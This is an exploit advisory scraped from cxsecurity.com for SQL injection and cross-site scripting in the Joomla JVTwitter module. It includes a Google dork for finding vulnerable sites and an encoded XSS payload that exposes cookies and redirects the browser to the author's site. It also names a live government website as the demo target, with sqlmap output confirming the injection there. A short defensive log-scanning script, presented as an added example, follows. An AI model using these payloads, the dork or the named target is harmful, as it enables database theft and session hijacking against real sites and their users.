Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
2020-11-08 00:18:22 Author: cxsecurity.com Views: 267


#############################################################
# Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
# Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id=
# Date: 2020-11-07
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: joomlavi.com
# Software Version: *
# Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android
#############################################################

[*] Vuln Info:
==============
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Cross-Site Scripting (XSS) is an attack in which an attacker places malicious client-side code into a web page. Attackers use XSS vulnerabilities to steal user data, control user sessions, run malicious code, or even as a major component of phishing scams.

#############################################################

[*] Exploit:
============
/modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I]
/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E

#############################################################

[*] Demo:
=========
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=110 AND 6499=6499-- xBNX

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel
---
[08:01:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0

https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E

#############################################################

[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1
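A defender-side check for the requests this advisory describes, added here as an example and not part of the original advisory or the vendor's code: it scans combined-format access log lines for requests to the module path whose id parameter is not a plain integer. The log lines, client addresses and label names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

MODULE_PATH = "/modules/mod_jvtwitter/jvtwitter.php"  # path from the advisory
# Client address, request target and status from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
MARKUP_RE = re.compile(r"[<>\"']")
SQL_RE = re.compile(r"\b(and|or|select|union|from|sleep|concat)\b|--|/\*", re.I)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2020:08:00:01 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Nov/2020:08:01:02 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110%20AND%206499%3D6499--%20x HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.5 - - [07/Nov/2020:08:02:10 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=%2522%253E%253Cb%253E HTTP/1.1" 200 4980 "-" "-"',
    '192.0.2.10 - - [07/Nov/2020:08:03:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def classify_id(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    for _ in range(3):  # decode repeatedly so double-encoded values are caught
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if MARKUP_RE.search(value):
        return "markup-in-id"
    if SQL_RE.search(value):
        return "sql-syntax-in-id"
    return "non-numeric-id"

def scan(lines):
    """Yield (client, status, label) for suspicious requests to the module."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(MODULE_PATH):  # allow subdirectory installs
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                yield client, int(status), label

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status only shows the request was served, not that it succeeded; the same integer-only rule applied at the application or WAF layer is what actually blocks both request shapes.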



 



Source: https://cxsecurity.com/issue/WLB-2020110041